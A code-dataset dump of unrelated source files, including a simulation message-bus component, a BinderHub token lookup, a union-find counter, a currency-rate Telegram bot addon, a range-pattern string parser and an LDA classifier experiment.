-> None:\n \"\"\"Forwards the message handling to the appropriate function depending on the message type.\n Assumes that the messages are not of type SimulationStateMessage or EpochMessage.\n\n NOTE: this method should be overwritten in any child class that listens to other messages.\n \"\"\"\n if isinstance(message_object, AbstractMessage):\n LOGGER.debug(\"Received {} message from topic {}\".format(\n message_object.message_type, message_routing_key))\n else:\n LOGGER.debug(\"Received unknown message: {}\".format(str(message_object)))\n\n async def simulation_state_message_handler(self, message_object: SimulationStateMessage,\n message_routing_key: str) -> None:\n \"\"\"Handles the received simulation state messages.\"\"\"\n if message_object.simulation_id != self.simulation_id:\n LOGGER.info(\n \"Received state message for a different simulation: '{}' instead of '{}'\".format(\n message_object.simulation_id, self.simulation_id))\n elif message_object.message_type != SimulationStateMessage.CLASS_MESSAGE_TYPE:\n LOGGER.info(\n \"Received a state message with wrong message type: '{}' instead of '{}'\".format(\n message_object.message_type, SimulationStateMessage.CLASS_MESSAGE_TYPE))\n else:\n LOGGER.debug(\"Received a state message from {} on topic {}\".format(\n message_object.source_process_id, message_routing_key))\n self._triggering_message_ids = [message_object.message_id]\n await 
self.set_simulation_state(message_object.simulation_state)\n\n async def epoch_message_handler(self, message_object: EpochMessage, message_routing_key: str) -> None:\n \"\"\"Handles the received epoch messages.\"\"\"\n if message_object.simulation_id != self.simulation_id:\n LOGGER.info(\n \"Received epoch message for a different simulation: '{}' instead of '{}'\".format(\n message_object.simulation_id, self.simulation_id))\n elif message_object.message_type != EpochMessage.CLASS_MESSAGE_TYPE:\n LOGGER.info(\n \"Received an epoch message with wrong message type: '{}' instead of '{}'\".format(\n message_object.message_type, EpochMessage.CLASS_MESSAGE_TYPE))\n elif (message_object.epoch_number == self._latest_epoch and\n self._latest_status_message_id in message_object.triggering_message_ids):\n LOGGER.info(\"Status message has already been registered for epoch {}\".format(self._latest_epoch))\n else:\n LOGGER.debug(\"Received an epoch from {} on topic {}\".format(\n message_object.source_process_id, message_routing_key))\n self._triggering_message_ids = [message_object.message_id]\n self._latest_epoch_message = message_object\n\n # clear and initialize any variables used to store input within the epoch\n self.clear_epoch_variables()\n\n # If all the epoch calculations were completed, send a new status message.\n if not await self.start_epoch():\n LOGGER.debug(\"Waiting for other required messages before processing epoch {}\".format(\n self._latest_epoch))\n\n async def send_status_message(self) -> None:\n \"\"\"Sends a new status message to the message bus.\"\"\"\n if self._in_error_state:\n # component is in an error state => send an error message instead\n await self.send_error_message(self._error_description)\n return\n\n status_message = self._get_status_message()\n if status_message is None:\n await self.send_error_message(\"Internal error when creating status message.\")\n else:\n await self._rabbitmq_client.send_message(self._status_topic, status_message.bytes())\n self._completed_epoch = self._latest_epoch\n self._latest_status_message_id = status_message.message_id\n\n async def send_error_message(self, description: str) -> None:\n \"\"\"Sends an error message to the message bus.\"\"\"\n self._error_description = description\n self._in_error_state = True\n\n error_message = self._get_error_message(description)\n if error_message is None:\n # An error so serious that even the error message could not be created => stop the component.\n LOGGER.error(\"Could not create an error message\")\n await self.stop()\n else:\n await self._rabbitmq_client.send_message(self._error_topic, error_message.bytes())\n\n def _get_status_message(self) -> Union[StatusMessage, None]:\n \"\"\"Creates a new status message and returns the created message object.\n Returns None, if there was a problem creating the message.\"\"\"\n try:\n return self._message_generator.get_status_ready_message(\n EpochNumber=self._latest_epoch,\n TriggeringMessageIds=self._triggering_message_ids)\n\n except (ValueError, TypeError, MessageError) as message_error:\n LOGGER.error(\"Problem with creating a status message: {}\".format(message_error))\n return None\n\n def _get_error_message(self, description: str) -> Union[StatusMessage, None]:\n \"\"\"Creates a new error message and returns the created message object.\n Returns None, if there was a problem creating the message.\"\"\"\n try:\n return self._message_generator.get_status_error_message(\n EpochNumber=self._latest_epoch,\n TriggeringMessageIds=self._triggering_message_ids,\n 
Description=description)\n\n except (ValueError, TypeError, MessageError) as message_error:\n LOGGER.error(\"Problem with creating an error message: {}\".format(message_error))\n return None\n\n def __set_component_variables(self,\n simulation_id: Optional[str] = None,\n component_name: Optional[str] = None,\n epoch_message_topic: Optional[str] = None,\n simulation_state_message_topic: Optional[str] = None,\n status_message_topic: Optional[str] = None,\n error_message_topic: Optional[str] = None,\n other_topics: Optional[List[str]] = None):\n \"\"\"Sets the topic name related variables for the object. Called automatically from the constructor.\"\"\"\n if simulation_id is None:\n simulation_id = cast(str, EnvironmentVariable(SIMULATION_ID, str, \"2020-01-01T00:00:00.000Z\").value)\n if component_name is None:\n component_name = cast(str, EnvironmentVariable(SIMULATION_COMPONENT_NAME, str, \"component\").value)\n\n if simulation_state_message_topic is None:\n simulation_state_message_topic = cast(\n str, EnvironmentVariable(SIMULATION_STATE_MESSAGE_TOPIC, str, \"SimState\").value)\n if epoch_message_topic is None:\n epoch_message_topic = cast(str, EnvironmentVariable(SIMULATION_EPOCH_MESSAGE_TOPIC, str, \"Epoch\").value)\n if status_message_topic is None:\n status_message_topic = cast(\n str, EnvironmentVariable(SIMULATION_STATUS_MESSAGE_TOPIC, str, \"Status.Ready\").value)\n if error_message_topic is None:\n error_message_topic = cast(\n str, EnvironmentVariable(SIMULATION_ERROR_MESSAGE_TOPIC, str, \"Status.Error\").value)\n if other_topics is None:\n other_topics_from_env = cast(str, EnvironmentVariable(SIMULATION_OTHER_TOPICS, str, \"\").value)\n if other_topics_from_env:\n other_topics = other_topics_from_env.split(\",\")\n else:\n other_topics = []\n\n # NOTE: No checking for the validity of the parameters is done here. 
If for example the simulation_id is\n # invalid, the component should enter an error state when trying to create a message.\n self._simulation_id = simulation_id\n self._component_name = component_name\n\n self._simulation_state_topic = simulation_state_message_topic\n self._epoch_topic = epoch_message_topic\n self._status_topic = status_message_topic\n self._error_topic = error_message_topic\n self._other_topics = other_topics\n\n @staticmethod\n def __get_rabbitmq_parameters(**kwargs: Union[str, int, bool, None]) -> Dict[str, Union[str, int, bool]]:\n \"\"\"Returns a dictionary of parameters that can be used with the RabbitmqClient constructor.\n Only those parameters that are not None will be included in the dictionary.\"\"\"\n return {\n parameter_name: parameter_value\n for parameter_name, parameter_value in kwargs.items()\n if parameter_value is not None\n }\n\n @staticmethod\n def __load_start_message() -> Optional[Dict[str, Any]]:\n \"\"\"Tries to load the Start message from a file.\n The filename is read from the environmental variable SIMULATION_START_MESSAGE_FILENAME.\n If the message loading is successful, returns the message as a dictionary.\n Otherwise, returns None.\"\"\"\n try:\n start_message_filename = EnvironmentVariable(SIMULATION_START_MESSAGE_FILENAME, str).value\n if isinstance(start_message_filename, str):\n with open(start_message_filename, mode=\"r\", encoding=\"UTF-8\") as start_message_file:\n start_message = json.load(start_message_file)\n if isinstance(start_message, dict):\n return start_message\n\n LOGGER.warning(\"Could not load the Start message from file '{}'.\".format(start_message_filename))\n return None\n\n except (OSError, TypeError, OverflowError, ValueError) as error:\n LOGGER.warning(\"Exception '{}' when trying to load the Start message from file: {}\".format(\n type(error).__name__, error))\n return None\n","sub_path":"domain-messages/simulation-tools/tools/components.py","file_name":"components.py","file_ext":"py","file_size_in_byte":30065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"463806281","text":"import re\nfrom tornado.log import app_log\nfrom . 
import orm\n\n\nclass BinderHubTokenProvider:\n def __init__(self, db):\n self.db = db\n\n def get_user_token(self, request):\n token = self._get_token(request)\n if token is None:\n return None\n orm_token = orm.OAuthAccessToken.find(self.db, token)\n if orm_token is None:\n app_log.warning('No token for %s', token)\n return None\n app_log.debug('Found token for %s', orm_token.user_name)\n return orm_token.user\n\n def _get_token(self, handler):\n token = handler.get_argument('token', None)\n if token is not None:\n return token\n authheader = handler.request.headers.get('Authorization')\n if authheader is None:\n return None\n matched = re.match(r'^Bearer\\s+(.+)$', authheader)\n if matched is None:\n return None\n return matched.group(1)\n","sub_path":"binderhub/oauth/token_provider.py","file_name":"token_provider.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"568450868","text":"#!/usr/bin/python3\n\n# @Project = step_LeetCode\n# @File : 1028_Recover_a_Tree_From_Preorder_Traversal\n# @Author : TCY\n# @Time : 2019/8/10 11:21\n# @Email : tangcaiyuan@hust.edu.cn\n# @Software: PyCharm\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def recoverFromPreorder(self, S: str) -> TreeNode:\n stack = []\n i = 0\n while i < len(S):\n level = 0\n while S[i] == '-':\n level += 1\n i += 1\n strx = ''\n while i < len(S) and S[i] != '-':\n strx += S[i]\n i += 1\n x = int(strx)\n\n while len(stack) > level:\n stack.pop()\n node = TreeNode(x)\n if stack:\n if stack[-1].left == None:\n stack[-1].left = node\n else:\n stack[-1].right = node\n stack.append(node)\n return stack[0]\n","sub_path":"Weekly_Contest/Weekly_Contest_132/1028_Recover_a_Tree_From_Preorder_Traversal.py","file_name":"1028_Recover_a_Tree_From_Preorder_Traversal.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"166914055","text":"import re\n\ndef readingLines():\n count = 0\n\n try:\n with open('people.txt') as file_object:\n contents = file_object.readlines()\n for line in contents:\n count += 1\n print(\"Line \" + str(count) + \": \" + line)\n except OSError as booboo:\n\n print(\"We had a booboo!!\")\n print(booboo)\n\n\n\ndef readingLinesAndSearch():\n try:\n with open('people.txt') as file_object:\n contents = file_object.readlines()\n for line in contents:\n if line.rstrip() == \"Lucy\":\n print(\"-> We found Lucy!\\n\")\n else:\n print(line)\n except OSError as booboo:\n print(\"We had a booboo!!\")\n print(booboo)\n\n\ndef readingLinesWithFind():\n try:\n with open('people.txt') as file_object:\n contents = file_object.readlines()\n for line in contents:\n hit = line.find(\"Lucy\")\n \n if hit != -1:\n print(\"-> We found Lucy in the line of text!\\n\")\n else:\n print(line)\n \n except OSError as booboo:\n print(\"We had a booboo!!\")\n print(booboo)\n\n\ndef regExMagic(pattern, string):\n objectMatch = re.search(pattern, string)\n return objectMatch\n\n\ndef readingLinesWithRegEx():\n try:\n with open('people.txt') as file_object:\n contents = file_object.readlines()\n print('\\n')\n for line in contents:\n\n pattern = 'Lucy$'\n if str(regExMagic(pattern, line)) == \"None\":\n print(line)\n else:\n print(\"-- > We found the text: \" + pattern + \", in this line: \" + line + \"\\n\")\n\n except OSError as booboo:\n 
print(\"We had a booboo!!\")\n print(booboo)\n\n\nreadingLinesWithRegEx() \n","sub_path":"python ch8/read_file_lines.py","file_name":"read_file_lines.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"269036215","text":"from enchant.checker import SpellChecker\nimport sys\nimport decimal\nimport tkFileDialog\nimport time\nfrom Menu import *\n\nclass Primero(QtGui.QDialog):\n archivo = None\n marcado = None\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self,parent)\n self.ui =Ui_Dialog()\n self.ui.setupUi(self)\n QtCore.QObject.connect(self.ui.toolButton,QtCore.SIGNAL('clicked()'),self.Abrir)\n QtCore.QObject.connect(self.ui.pushButton,QtCore.SIGNAL('clicked()'),self.Validar)\n\n def TotalKeyword(self,SKeyword):\n tkeyword = 0\n texto = open(self.archivo, 'r')\n text = texto.readline()\n lista = text.split(\" \")\n total = len(text.split(\" \"))\n for err in lista:\n if err == SKeyword:\n tkeyword+=1\n tempo = decimal.Decimal(tkeyword)/decimal.Decimal(total)\n pkeyword = int(tempo*100)\n pkeyword=str(pkeyword)\n pkeyword+=\"%\"\n return pkeyword\n\n def Errores(self):\n terrores = 0\n texto = open(self.archivo, 'r')\n chkr = SpellChecker(\"es_ES\")\n chkr.set_text(texto.readline())\n for err in chkr:\n terrores+=1\n terrores=str(terrores)\n self.ui.errores.setText(terrores)\n\n def Cuentapalabras(self):\n tpalabras=None\n total=0\n texto = open(self.archivo, 'r')\n text= texto.readline()\n total = len(text.split(\" \"))\n tpalabras=total\n tpalabras=str(tpalabras)\n self.ui.palabras.setText(tpalabras)\n\n def Abrir(self):\n self.archivo = tkFileDialog.askopenfilename()\n ruta=str(self.archivo)\n self.ui.lineEdit.setText(ruta)\n texto = open(self.archivo, 'r')\n self.ui.textBrowser.setText(texto.readline())\n\n def Validar(self):\n self.Errores()\n self.Cuentapalabras()\n self.ui.progressBar.setValue(50)\n time.sleep(2)\n keyword = self.ui.skeyword.text()\n pkey=self.TotalKeyword(keyword)\n self.ui.pkeyword.setText(pkey)\n self.ui.progressBar.setValue(100)\n\n\nif __name__ == \"__main__\":\n app=QtGui.QApplication(sys.argv)\n myapp=Primero()\n myapp.show()\n sys.exit(app.exec_())\n\n","sub_path":"Primero.py","file_name":"Primero.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"397022379","text":"# -*- coding:utf-8 -*-\n\n\"\"\"\n利用并查集计算一个图的连通分量数目\n\"\"\"\n\nclass UnionFindSet(object):\n \"\"\"\n 实现一个并查集\n \"\"\"\n def __init__(self, m_nN):\n self.m_nN = m_nN\n self.m_pParent = [i for i in range(m_nN)]\n\n\n def find(self, i):\n \"\"\"\n 找到节点i最终的父节点。\n 该查找改变了原数组。\n :param i:\n :return:\n \"\"\"\n if i < 0 or i >= self.m_nN:\n return -1\n\n root = i\n while root != self.m_pParent[root]: # 尚未找到根节点\n root = self.m_pParent[root]\n\n # 路径压缩(只要查找过一次,路径就被压缩为1)\n t = i\n while t != root:\n p = self.m_pParent[t]\n self.m_pParent[t] = root\n t = p\n\n return root\n\n\n def find2(self, i):\n \"\"\"\n 和find等价,递归实现。\n :param i:\n :return:\n \"\"\"\n if i != self.m_pParent[i]:\n self.m_pParent[i] = self.find2(self.m_pParent[i])\n return self.m_pParent[i]\n\n\n def union(self, i, j):\n \"\"\"\n 合并一条边的节点i和j\n :param i:\n :param j:\n :return:\n \"\"\"\n if i < 0 or i >= self.m_nN or j < 0 or j > self.m_nN:\n return\n ri = self.find(i)\n rj = self.find(j)\n if ri != rj:\n self.m_pParent[ri] = rj\n\n\ndef calcCompoment():\n \"\"\"\n 计算一个图的连通分量数目\n :return:\n \"\"\"\n N = 10\n ufs = UnionFindSet(N)\n 
ufs.union(2, 6)\n ufs.union(5, 6)\n ufs.union(1, 8)\n ufs.union(2, 9)\n ufs.union(5, 3)\n ufs.union(4, 8)\n ufs.union(4, 0)\n\n\n# count how many trees (distinct roots) there are\n component = [0] * N\n for i in range(N):\n component[ufs.find(i)] += 1\n print(component)\n\n nComponent = 0\n for i in range(N):\n if component[i] != 0:\n nComponent += 1\n return nComponent\n\n\nif __name__ == '__main__':\n print(calcCompoment())","sub_path":"tree/UnionFind.py","file_name":"UnionFind.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"191523583","text":"import requests\nimport json\nimport math\nimport datetime\nimport lxml.html as html\nfrom .core_addon import BotCommand, BotAddon\n\nBINANCE_SYMBOLS = [\n (\"Bitcoin к USDT\", \"BTCUSDT\", \"USD\"),\n (\"Ethereum к USDT\", \"ETHUSDT\", \"USD\"),\n (\"BNB к USDT\", \"BNBUSDT\", \"USD\"),\n (\"Ripple к USDT\", \"XRPUSDT\", \"USD\"),\n (\"Dogecoin к USDT\", \"DOGEUSDT\", \"USD\")\n ]\n\nlink_moex = \"https://iss.moex.com/iss/statistics/engines/futures/markets/indicativerates/securities\"\n\ndef _get_currencies_all():\n r = requests.get(\"https://www.cbr-xml-daily.ru/daily_json.js\")\n if r.status_code != 200:\n return {\n \"status\": \"ERROR\",\n \"code\": r.status_code\n }\n else:\n result = json.loads(r.text)\n result[\"status\"] = \"OK\"\n return result\n\n\ndef _get_currencies_moex():\n r = requests.get(link_moex)\n doc = html.document_fromstring(r.content)\n rows = doc.findall(\".//row\")\n moex_result = {}\n for row in rows:\n moex_result[row.get(\"secid\")] = {\n \"rate\": float(row.get(\"rate\") or 0),\n \"tradedate\": row.get(\"tradedate\"),\n \"tradetime\": row.get(\"tradetime\")\n }\n return moex_result\n\n\n# Currencies is a list of dicts:\n# display - display name (or flag)\n# code - three-letter code of currency\ndef _get_currencies(all_results, currencies, moex=None):\n result_string = \"\"\n if all_results[\"status\"] != \"OK\":\n return \"Что-то пошло не так\"\n timestamp_str = all_results[\"Timestamp\"]\n if \":\" == timestamp_str[-3:-2]:\n timestamp_str = timestamp_str[:-3] + timestamp_str[-2:]\n timestamp = datetime.datetime.strptime(timestamp_str,\n \"%Y-%m-%dT%H:%M:%S%z\")\n result_string += \"Данные на {}:\".format(timestamp.strftime(\"%d.%m.%Y\"))\n for curr in currencies:\n code = curr[\"code\"]\n logo = curr[\"display\"]\n nominal = 1\n if code in all_results[\"Valute\"]:\n nominal = all_results[\"Valute\"][code][\"Nominal\"]\n current = all_results[\"Valute\"][code][\"Value\"]\n previous = all_results[\"Valute\"][code][\"Previous\"]\n name = all_results[\"Valute\"][code][\"Name\"]\n diff = current - previous\n result_string += \"\\n{} {} {}: {} ₽\".format(logo,\n nominal,\n name,\n current)\n if diff > 0:\n result_string += \" (🔺{})\".format(round(diff, 4))\n elif diff < 0:\n result_string += \" (🔻{})\".format(round(diff, 4))\n else:\n result_string += \" (не менялся)\"\n else:\n result_string += \"\\n{} Курс не установлен\".format(logo)\n moex_res = moex.get(\"{}/RUB\".format(curr[\"code\"]))\n if moex_res:\n result_string += \", биржевой курс на {} {} — {:.4f} ₽\".format(\n moex_res[\"tradedate\"],\n moex_res[\"tradetime\"],\n moex_res[\"rate\"] * nominal)\n return result_string\n\n\ndef get_usd_eur(cmd, user, chat, message, cmd_args):\n bot = cmd.addon.bot\n cb_results = _get_currencies_all()\n moex_results = _get_currencies_moex()\n txt = _get_currencies(cb_results, [\n {\n \"code\": \"USD\",\n \"display\": \"🇺🇸\"\n },\n {\n \"code\": \"EUR\",\n \"display\": 
\"🇪🇺\"\n },\n {\n \"code\": \"CNY\",\n \"display\": \"🇨🇳\"\n },\n {\n \"code\": \"TRY\",\n \"display\": \"🇹🇷\"\n },\n {\n \"code\": \"GEL\",\n \"display\": \"🇬🇪\"\n },\n {\n \"code\": \"KZT\",\n \"display\": \"🇰🇿\"\n },\n {\n \"code\": \"AMD\",\n \"display\": \"🇦🇲\"\n },\n {\n \"code\": \"UZS\",\n \"display\": \"🇺🇿\"\n },\n {\n \"code\": \"THB\",\n \"display\": \"🇹🇭\"\n },\n {\n \"code\": \"RSD\",\n \"display\": \"🇷🇸\"\n }\n ], moex_results)\n bot.send_message(chat, txt, origin_user=user,\n reply_to=message.message_id)\n\n\ndef get_crypto(cmd, user, chat, message, cmd_args):\n bot = cmd.addon.bot\n moex_results = _get_currencies_moex()\n result_string = \"Средние курсы криптовалют на Binance за последние 5 минут:\\n\\n\"\n for cc in BINANCE_SYMBOLS:\n price = requests.get(\n \"https://data.binance.com\"\n \"/api/v3/avgPrice?symbol={}\".format(cc[1])).json().get(\"price\")\n if price is not None:\n fprice = float(price or 0)\n result_string += \"{} — {:.4f}\".format(cc[0], fprice)\n moex_cur = moex_results.get(\"{}/RUB\".format(cc[2]))\n if moex_cur:\n result_string += \" ({:.2f} ₽ по биржевому курсу)\".format(\n moex_cur[\"rate\"] * fprice)\n else:\n result_string += \"Не удалось получить для пары {}\".format(cc[0])\n result_string += \"\\n\"\n bot.send_message(chat, result_string, origin_user=user,\n reply_to=message.message_id)\n\n\ndef cmd_usd_eur():\n return BotCommand(\"currencies\",\n get_usd_eur,\n help_text=\"Текущий курс основных валют к рублю ЦБ РФ\")\n\n\ndef cmd_crypto():\n return BotCommand(\"crypto\",\n get_crypto,\n help_text=\"Текущий курс основных криптовалют на Binance\")\n\n\ndef make_cbrf_addon():\n return BotAddon(\"CBRF\", \"курсы валют\",\n [cmd_usd_eur(), cmd_crypto()])\n ","sub_path":"rpfti_telegram/cbrf.py","file_name":"cbrf.py","file_ext":"py","file_size_in_byte":5905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"574928893","text":"import os\nfrom rofi import Rofi\n\n\nbookdir=\"/home/mar/books/\"\nsubject=(\"drawing books\",\"programing\")\nr=Rofi()\nindex1,key =r.select(\"what subject\", subject)\nprint(index1,key)\n\nif index1==-1:\n chosenSubjet=\"\"\n a=os.listdir(bookdir)\nelse:\n chosenSubjet=subject[index1]\n\na=os.listdir(bookdir+chosenSubjet)\nbooks =[b for b in a if b not in subject]\nchosenBookIndex,key =r.select(\"what book\", books)\nos.system('mupdf \"'+bookdir+chosenSubjet+'/'+books[chosenBookIndex]+'\"')\n","sub_path":"scripts/fileOpener.py","file_name":"fileOpener.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"506984739","text":"from core.parsing_state import ParsingState\nfrom parsers.base_parser import BaseParser\n\nclass RangeParser(BaseParser):\n \"\"\"This parser handles three kind of range patterns\n\n It handles patterns which are called:\n 1. positional range\n 2. ascii range\n 3. 
numbers range\n\n Examples\n --------\n Beginning character: '<'\n Ending character: '>'\n\n Example of positional range:\n\n <ac-cd>\n\n Result:\n ac\n bc\n cc\n ad\n bd\n cd\n\n Example of ascii range:\n\n <ab%ad>\n\n Result:\n ab\n ac\n ad\n\n Example of number range:\n\n <10;13>\n\n Result:\n 10\n 11\n 12\n 13\n \"\"\"\n MAX_ASCII = 126\n MIN_ASCII = 32\n\n def _handle_initialize(self):\n self._to_default()\n\n def _to_default(self):\n self.left_part = []\n self.right_part = []\n self.delimiter = ''\n self.actual_part = self.left_part\n\n #override\n def _handle_start_parsing(self):\n ParsingState.get_instance().start_new_group()\n\n def _handle_end_parsing(self):\n self.__generate_range()\n self._to_default()\n\n def _handle_character(self, character):\n if character in ['-', ';', '%']:\n self.actual_part = self.right_part\n self.delimiter = character\n else:\n self.actual_part.append(character)\n\n def __generate_range(self):\n if self.delimiter == '-':\n self.__generate_positional_range()\n elif self.delimiter == ';':\n self.__generate_numbers_range()\n elif self.delimiter == '%':\n self.__generate_ascii_range()\n\n def __generate_numbers_range(self):\n self.__parts_to_numbers()\n diff = abs(self.left_part - self.right_part)\n for i in range(diff + 1):\n ParsingState.get_instance().add_to_results(str(self.left_part + i))\n\n def __parts_to_numbers(self):\n self.left_part = int(''.join(self.left_part))\n self.right_part = int(''.join(self.right_part))\n\n def __generate_positional_range(self):\n self.__parts_to_ascii()\n self.__generate_positional_by_recursion(0, '')\n\n def __parts_to_ascii(self):\n for i in range(len(self.left_part)):\n self.left_part[i] = ord(self.left_part[i])\n for i in range(len(self.right_part)):\n self.right_part[i] = ord(self.right_part[i])\n diff = abs(len(self.left_part) - len(self.right_part))\n for i in range(diff):\n if len(self.left_part) < len(self.right_part):\n self.left_part.append(RangeParser.MIN_ASCII)\n elif len(self.left_part) > len(self.right_part):\n self.right_part.append(RangeParser.MAX_ASCII)\n\n def __generate_positional_by_recursion(self, position, actual_word):\n if position >= len(self.left_part):\n ParsingState.get_instance().add_to_results(actual_word)\n return\n diff = abs(self.left_part[position] - self.right_part[position])\n for i in range(diff + 1):\n actual_char = chr(self.left_part[position] + i)\n self.__generate_positional_by_recursion(position + 1, actual_word + actual_char)\n\n def __generate_ascii_range(self):\n self.__parts_to_ascii()\n temporary_array_word = list(self.left_part)\n while True:\n actual_word = ''\n for ascii_elem in temporary_array_word:\n actual_word += chr(ascii_elem)\n ParsingState.get_instance().add_to_results(actual_word)\n if self.__same_word(temporary_array_word, self.right_part):\n break\n temporary_array_word = self.__next_word_array(temporary_array_word)\n\n def __same_word(self, first, second):\n result = True\n for i in range(len(first)):\n if first[i] != second[i]:\n result = False\n break\n return result\n\n def __next_word_array(self, temporary_array_word):\n temporary_array_word[-1] += 1\n temporary_array_word = self.__to_proper_base(RangeParser.MIN_ASCII, RangeParser.MAX_ASCII + 1, temporary_array_word)\n return temporary_array_word\n\n def __to_proper_base(self, min_value, base, array_word):\n repeat = False\n for i in range(len(array_word)):\n if array_word[i] >= base:\n array_word[i - 1] += 1\n array_word[i] = min_value\n repeat = True\n break\n if repeat:\n array_word = 
self.__to_proper_base(min_value, base, array_word)\n return array_word\n","sub_path":"parsers/range_parser.py","file_name":"range_parser.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"407466190","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn.metrics as sk\n\n\n#MAP CLASSIFIER\ndef calc_pdf(x, sigma, mu):\n csigma = (1/(2 * np.pi * np.linalg.det(sigma)**(1/2)))\n A = np.matmul(np.transpose(x-mu), np.linalg.inv(sigma))\n A = np.matmul(A, (x-mu))\n return csigma * np.exp((-1/2) * A)\n\ndef calc_w(mus, sigmas):\n j = mus[0] - mus[1]\n Sb = np.matmul([[j[0]], [j[1]]], [[j[0], j[1]]] )\n Sw = sigmas[0] + sigmas[1]\n\n A = np.matmul(np.linalg.inv(Sw), Sb)\n wLDA, v = np.linalg.eig(A)\n return wLDA\n\ndef project_data(samples, assignments, wLDA):\n print(wLDA)\n print(samples.shape)\n yLDA = np.matmul([wLDA], np.transpose(samples))\n assign_0 = []\n assign_1 = []\n for x in range(1000):\n if assignments[x] == 1:\n assign_1.append(x)\n else:\n assign_0.append(x)\n mean_00 = sum([samples[x][0] for x in assign_0]) * 1/len(assign_0)\n print(mean_00)\n mean_01 = sum([samples[x][1] for x in assign_0]) * 1 / len(assign_0)\n print(mean_01)\n mean_10 = sum([samples[x][0] for x in assign_1]) * 1/len(assign_1)\n print(mean_10)\n mean_11 = sum([samples[x][1] for x in assign_1]) * 1 / len(assign_1)\n print(mean_11)\n\n sign0 = np.sign(mean_10 - mean_00)\n sign1 = np.sign(mean_11 - mean_01)\n\n wLDA = np.matmul([[sign0], [sign1]] , [wLDA])\n yLDA = np.matmul([[sign0], [sign1]], [yLDA])\n\n\n return wLDA[0], yLDA[0]\n\n\ndef generate_samples(N, priors, mus, sigmas):\n # Assign samples and generate values\n samples = np.zeros((N, 2))\n sample_assignments = np.zeros(N)\n for i in range(N):\n rand = np.random.uniform()\n #class 0\n if rand > priors[0]:\n sample_assignments[i] = 1\n samples[i] = np.random.multivariate_normal(mus[1], sigmas[1])\n #class 1\n else:\n samples[i] = np.random.multivariate_normal(mus[0], sigmas[0])\n return samples, sample_assignments\n\n\n\ndef plot_LDA_results(samples, yLDA):\n plt.plot(yLDA[0], np.zeros(N), marker=\"o\", label='Class 0')\n plt.plot(yLDA[1], np.zeros(N), marker=\"x\", label='Class 1 ')\n\n #plt.plot(samples[0], samples[1])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('LDA')\n plt.legend(loc=\"lower right\")\n plt.show()\n\n\ndef generateROC_min_risk(N, increments, priors, mus, sigmas):\n \"\"\"This code here is a disaster but it does what it needs to\"\"\"\n\n truePos_vals = np.zeros(increments)\n falsePos_vals = np.zeros(increments)\n index = 0\n for gamma in np.linspace(0, 100, increments):\n print(gamma)\n samples, sample_assignments = generate_samples(N, priors, mus, sigmas)\n classifications = classify_samples_min_risk(samples, mus, sigmas, gamma)\n truePos, falsePos, error = eval_classifications(sample_assignments, classifications)\n truePos_vals[index] = truePos\n falsePos_vals[index] = falsePos\n index += 1\n\n ##ADD MAP VAL\n MAP = priors[0] / priors[1]\n samples, sample_assignments = generate_samples(N, priors, mus, sigmas)\n classifications = classify_samples_min_risk(samples, mus, sigmas, MAP)\n truePosMAP, falsePosMAP, errorMAP = eval_classifications(sample_assignments, classifications)\n print('MAP error', errorMAP/N)\n\n plt.plot(falsePos_vals, truePos_vals, color='darkorange', label='ROC curve ')\n plt.plot([0, 1], [0, 1], color='navy', linestyle='--')\n plt.plot([falsePosMAP], 
[truePosMAP], color='green', marker='o', linestyle='dashed',\n linewidth=2, markersize=12, label=\"MAP Classifier\")\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('ROC curve')\n plt.legend(loc=\"lower right\")\n plt.show()\n\n\nif __name__ == \"__main__\":\n\n n = 2 #Dimensions per feature\n N = 1000 #Number of samples\n mu0 = [-1, 0]\n mu1 = [1, 0]\n sigma0 = np.array([[2, 0], [0, 1]])\n sigma1 = np.array([[1, 0], [0, 4]])\n\n mus = np.array([mu0, mu1])\n sigmas = np.array([sigma0, sigma1])\n priors = np.array([0.35, 0.65])\n increments = 150\n\n samples, sample_assignments = generate_samples(N, priors, mus, sigmas)\n wLDA = calc_w(mus, sigmas)\n WLDA, yLDA = project_data(samples, sample_assignments, wLDA)\n plot_LDA_results(samples, yLDA)\n\n","sub_path":"LDA_classifier.py","file_name":"LDA_classifier.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"466563197","text":"\"\"\"Use this to complete part 4\n\n Usage:\n $ python mlp_four_layer.py\n\n\"\"\"\n\n\nimport mlp\n#import matplotlib.pyplot as plt\n\nEPOCHS = 100\n\nif __name__ == '__main__':\n train_loader = mlp.get_cifar10_data(train=True)\n validation_loader = mlp.get_cifar10_data(train=False)\n test_loader = mlp.get_cifar10_test_data()\n \n fl_train_loss1, fl_accv1, four_layer_model = mlp.four_NN_train_and_val(train_loader, validation_loader, epochs=EPOCHS)\n train_loss1, accv1, three_layer_model = mlp.sigmoid_NN_train_and_val(train_loader, validation_loader, epochs=EPOCHS)\n\n #train_loss2, accv2 = mlp.four_NN_train_and_val(train_loader, validation_loader, lr=0.01)\n 